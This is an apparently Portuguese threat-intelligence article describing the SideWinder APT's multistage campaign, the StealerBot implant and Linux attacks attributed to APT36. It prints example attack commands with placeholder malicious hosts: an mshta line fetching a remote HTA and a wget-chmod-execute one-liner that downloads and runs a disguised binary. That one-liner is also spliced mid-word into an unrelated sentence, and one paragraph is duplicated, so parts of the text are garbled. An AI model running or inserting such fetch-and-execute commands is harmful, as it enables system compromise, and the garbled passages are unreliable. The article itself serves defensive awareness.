SideWinder APT com ataques multietapas furtivos

 SideWinder APT ataca o Oriente Médio e África com ataques multietapas furtivos

Nos últimos meses, um grupo de ameaças persistentes avançadas (APT) conhecido como SideWinder ou APT-C-17, Baby Elephant, Hardcore Nationalist, entre outros tem realizado uma série de ataques direcionados a entidades de alto perfil e infraestruturas estratégicas no Oriente Médio e na África.

Supostamente com laços à Índia, o grupo tem se concentrado em alvos importantes, como governos, militares, empresas de telecomunicações, instituições financeiras, universidades e indústrias de petróleo, em países como Bangladesh, Djibouti, Arábia Saudita, Turquia e EAU.

Apesar de ser muitas vezes subestimado como um grupo de baixa qualificação devido ao uso de vetores de infecção conhecidos, como arquivos LNK maliciosos e scripts públicos, o SideWinder demonstrou um nível de sofisticação que se revela quando suas operações são analisadas em profundidade.

Estrutura multietapas do ataque

O diferencial mais significativo das campanhas recentes do SideWinder é o uso de uma cadeia de infecção multietapas para implantar um conjunto de ferramentas pós-exploração inédito, chamado StealerBot.

Este malware avançado tem como objetivo principal a espionagem, permitindo a instalação de módulos adicionais para roubo de informações, captura de credenciais, entre outras atividades maliciosas.

Fase 1: Spear-Phishing

O ataque começa com um e-mail de spear-phishing direcionado, contendo um anexo que pode ser um arquivo ZIP com um atalho do Windows (LNK) ou um documento do Microsoft Office. Esses arquivos, ao serem abertos, executam uma série de scripts intermediários em JavaScript e .NET, que eventualmente levam à instalação do StealerBot.

Exemplo de documento malicioso

• O documento malicioso utiliza a técnica de injeção de modelo remoto para baixar um arquivo RTF armazenado em um servidor controlado pelo atacante.
• Esse arquivo RTF explora uma vulnerabilidade antiga (CVE-2017-11882), permitindo a execução de código JavaScript adicional, que então baixa mais scripts hospedados em sites maliciosos.

Fase 2: Arquivo LNK e mshta.exe

Outro vetor comum é o uso de arquivos LNK maliciosos que empregam o utilitário mshta.exe, uma ferramenta nativa do Windows, para executar arquivos HTML maliciosos (HTA). Esses arquivos HTA contêm código JavaScript que, novamente carrega e executa uma série de comandos que levam à instalação do StealerBot.

Exemplo de Uso do mshta.exe

O mshta baixa e executa o conteúdo HTML malicioso que desencadeia a cadeia de infecção.

mshta http://site-malicioso[.]com/malicious.hta

Fase 3: Persistência e backdoor

Uma vez que o sistema está comprometido, o malware executa um backdoor conhecido desde 2020, que foi recentemente atualizado. Este backdoor evita detecção e ajusta seu comportamento dependendo das soluções de segurança instaladas na máquina alvo.

• O backdoor mantém a persistência no sistema e carrega módulos adicionais conforme necessário.
• Uma característica interessante é que nas versões mais recentes, o malware carrega arquivos sem extensão do diretório atual, o que ajuda a evitar sua detecção por soluções de segurança tradicionais.

Fase 4: StealerBot – Ferramenta modular avançada

O objetivo final do ataque é implantar o StealerBot, um implante modular avançado baseado em .NET. O StealerBot é capaz de realizar diversas ações maliciosas, incluindo:

• Instalação de malware adicional usando um downloader em C++.
• Captura de telas e registro de teclas digitadas (keylogging).
• Roubo de senhas armazenadas em navegadores.
• Intercepção de credenciais RDP.
• Roubo de arquivos locais.
• Execução de shell reverso, permitindo controle remoto do sistema.
• Phishing de credenciais do Windows.
• Elevação de privilégios no sistema, bypassando o Controle de Conta de Usuário (UAC).

Exemplo de uso do StealerBot

Uma vez implantado, o StealerBot é gerenciado por um módulo principal chamado Orchestrator, que se comunica com o servidor de comando e controle (C2) do atacante e carrega os diferentes módulos necessários para a operação maliciosa.

Fase 5: Atualizações e Evolução do SideWinder

Além do StealerBot, o SideWinder utiliza componentes chamados InstallerPayload e InstallerPayload_NET, que não fazem parte da cadeia de ataque principal, mas são usados para instalar novas versões do StealerBot ou infectar novos alvos. Isso demonstra a capacidade do grupo de adaptar e atualizar suas ferramentas com o tempo, tornando-se cada vez mais perigoso.

Expansão geográfica e colaboração com outros grupos

O SideWinder tem expandido seu alcance geográfico para além do Oriente Médio e da África, focando em entidades diplomáticas na França, China, Índia, Indonésia e Marrocos. Além disso, novas infraestruturas de ataque, como o Mythic post-exploitation framework, foram associadas a outro gwget http://servidor-malicioso[.]com/malicious.pdf && chmod +x malicious.pdf && ./malicious.pdfrupo APT, o Transparent Tribe (também conhecido como APT36), que tem origem no Paquistão.

Além do StealerBot, o SideWinder utiliza componentes chamados InstallerPayload e InstallerPayload_NET, que não fazem parte da cadeia de ataque principal, mas são usados para instalar novas versões do StealerBot ou infectar novos alvos. Isso demonstra a capacidade do grupo de adaptar e atualizar suas ferramentas com o tempo, tornando-se cada vez mais perigoso.

Ameaças em ambientes Linux

Outro ponto alarmante é o aumento de ataques a ambientes Linux. Grupos como o APT36 têm distribuído arquivos de entrada de desktop do Linux disfarçados de PDFs, que ao serem executados, baixam binários maliciosos, garantindo acesso persistente e evitando a detecção.

Exemplo de ataque em ambientes Linux

Esse comando baixa o PDF disfarçado, que na verdade contém scripts para baixar e executar um binário malicioso.

wget http://servidor-malicioso[.]com/malicious.pdf && chmod +x malicious.pdf && ./malicious.pdf